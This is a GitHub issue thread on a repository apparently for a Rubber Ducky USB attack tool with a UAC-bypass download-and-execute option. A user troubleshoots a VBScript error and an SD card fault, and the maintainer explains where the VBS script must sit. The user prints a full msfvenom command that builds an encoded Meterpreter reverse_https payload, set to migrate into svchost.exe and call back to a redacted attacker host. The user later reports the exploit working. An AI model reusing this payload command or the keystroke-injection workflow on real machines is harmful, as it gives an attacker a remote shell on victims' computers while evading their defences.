### ISSUE TITLE
Microsoft VBScript Compilation Error

### ISSUE THREAD

**Issue by tanc7** [SkiddieTech/UAC-D-E-Rubber-Ducky#2]
Tried to let the payload manually execute. Didn't do anything. I have the Twin Duck, Special Request #2 from Ducky-Flasher installed. 

**Chose Option #4: [4] - Generate binary download & execute ducky script (With UAC bypass - 2 stager)**

Then double-clicked on the vbs file and this turned up.

**"Line 31: Char 5, Error: Expected If, Code 800A03F4, Source: Microsoft VBScript Compilation Error"**

I looked at the other stuff, the DuckyScript that was generated is a empty text file so I had to manually edit RAW_DuckyScript_Offline.txt to point to the right file. 

The payload I used, which is Meterpreter "windows/meterpreter/reverse_https" worked perfectly when manually executed. 

This was the payload that I made

**msfvenom -p windows/meterpreter/reverse_https LHOST=[REDACTED] LPORT=443 PrependMigrate=true PrependMigrateProc=svchost.exe -e x86/shikata_ga_nai -i 5 -b "\x00" -f exe -o test.exe**

**Comment by Flangvik** [comment]
For the VBS script to work it needs to be located on the rubber ducky drive. 
(This is because the VBS script uses it's current path to locate the payload to execute)

However i would strongly recommend you to use the online version if possible.

**Comment by tanc7** [comment]
Hey again. I found out the issue had nothing to do with your stuff.

There was some sort of issue with the firmware flashing on the Rubber
Ducky. The LED is glowing solid red.

From what i have dug up in Google, it either means it cannot read the
SDCard or it cannot locate inject.bin. I tried to flash it back with
ducky-flasher. No luck, still solid red. I read the Python code for
ducky-flasher, it looks like its going by the procedure perfectly. But now
it wont do the "speedy typing" that it used to do.

Anyways sorry for wasting your time. Gonna try a new SD card and see if
it'll work. And if not, then I am gonna try out these fresh thumbdrives and
check if they have the right Phison chips.

**Comment by Flangvik** [comment]
Glad to see it sorted

**Comment by tanc7** [comment]
Fixed the Rubber Ducky issue too LOL!

**As it turns out, a solid red light really does mean SDCard issue.** Apparently, by default, after a successful firmware flash, it goes a bright solid red, Only after reinserting a working SDCard with the proper inject.bin file will it turn back to green.

Weird. I figured that the stock 128MB SDCard that came with the Ducky would be better. A $5 one from Fry's did the trick. No pre-formatting required. 

**I got the exploit that you created working. Thanks.**
